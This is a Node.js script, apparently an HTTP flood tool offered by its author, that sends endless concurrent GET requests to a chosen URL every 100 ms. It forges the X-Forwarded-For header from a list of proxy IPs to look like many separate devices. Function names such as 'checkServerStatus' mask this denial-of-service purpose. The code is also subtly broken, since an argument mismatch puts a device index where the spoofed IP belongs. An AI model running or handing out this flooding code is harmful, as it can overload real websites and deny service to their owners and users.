/*

🬞 If you have discussions and want to cooperate with me to create more tools, please contact me via Telegram @ktvcau
Link to my Telegram: https://t.me/ktvcau

*/

const axios = require("axios");
const fs = require("fs");
const readline = require("readline");

let consoleOutputEnabled = true;

const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout
});

fs.readFile("config.json", "utf8", (err, configData) => {
  if (err) {
    console.error(err.message);
    return;
  }

  try {
    const config = JSON.parse(configData);

    if (!config.linkToCheck) {
      rl.question("NEW URL : ", (newLink) => {
        config.linkToCheck = newLink;
        updateConfigFile(config);
      });
    } else {
      rl.question(`USE OLD URL "${config.linkToCheck}"? (y/n) : `, (answer) => {
        if (answer.toLowerCase() === "n") {
          rl.question("NEW URL : ", (newLink) => {
            config.linkToCheck = newLink;
            updateConfigFile(config);
          });
        } else {
          simulateDeviceAccess(config.linkToCheck, config.numberOfDevices);
        }
      });
    }
  } catch (jsonError) {
    console.error(jsonError.message);
  }
});

function updateConfigFile(config) {
  fs.writeFile("config.json", JSON.stringify(config, null, 2), "utf8", (err) => {
    if (err) {
      console.error(err.message);
      return;
    }

    simulateDeviceAccess(config.linkToCheck, config.numberOfDevices);
  });
}

async function simulateDeviceAccess(linkToCheck, numberOfDevices) {
  const devicePromises = [];
  // const ipAddresses = [
  //   "82.66.245.82",
  //   "164.132.170.100",
  //   "20.219.118.36",
  //   "107.172.86.101"
  // ];
  const proxyFileContent = fs.readFileSync('ipOnly.txt', 'utf8'); // Here I leave the proxy format containing each IP without Port. You can check and filter your new Proxy and add it to the file 'ipOnly.txt'

  const ipAddresses = proxyFileContent.split(/\r?\n|\s/).filter(ip => ip.trim() !== '');
  for (let i = 0; i < numberOfDevices; i++) {
    const ipAddress = ipAddresses[i % ipAddresses.length]; 
    devicePromises.push(checkServerStatus(linkToCheck, i + 1, ipAddress));
  }

  await Promise.all(devicePromises);
}

async function checkServerStatus(linkToCheck, ipAddress) {

  while (true) {
    try {
      const response = await axios.get(linkToCheck, {
        headers: {
          "X-Forwarded-For": ipAddress  
        }
      });

      if (response.status === 200) {
        if (consoleOutputEnabled) {
          console.log(`[ XIE ] Successful responses – 200 OK`); 
        }
      } else {
        if (consoleOutputEnabled) {
          console.log(`[ XIE ] Error: ${response.status}`);
        }
      }
    } catch (error) {
      if (consoleOutputEnabled) {
        console.error(`[ XIE ] Error: ${error.message}`);
      }
    }

    await new Promise((resolve) => setTimeout(resolve, 100)); // do the job in 1 second
  }
}

/*** 
                                     
┃  ▂  ▂  ▂  ▂  ▂  ▂  ▂  ▂  ▂  ▂  ┃
  
This Code Was Generated By XIE
Please do not change the source if you update it. 
Because this is an idea I created myself! 

┃  ▂  ▂  ▂  ▂  ▂  ▂  ▂  ▂  ▂  ▂  ┃  


***/
